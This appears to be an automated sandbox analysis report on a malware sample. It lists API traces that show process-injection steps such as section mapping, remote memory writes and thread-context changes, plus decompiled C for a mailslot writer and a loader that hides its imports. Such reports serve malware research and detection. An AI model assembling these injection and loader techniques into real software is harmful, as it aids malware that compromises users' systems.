Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 64003

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	34C71A2B5584813A6BC94888E3669320
Total matches:	36
Initial Analysis Report:	Open
Initial sample Analysis ID:	64003
Initial sample SHA 256:	34CD6B92357754175CDC0BCA3CDA8C2AA439CDFBCC03683EE3B3D502E4C71151
Initial sample name:	crypt_0001_1096b.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

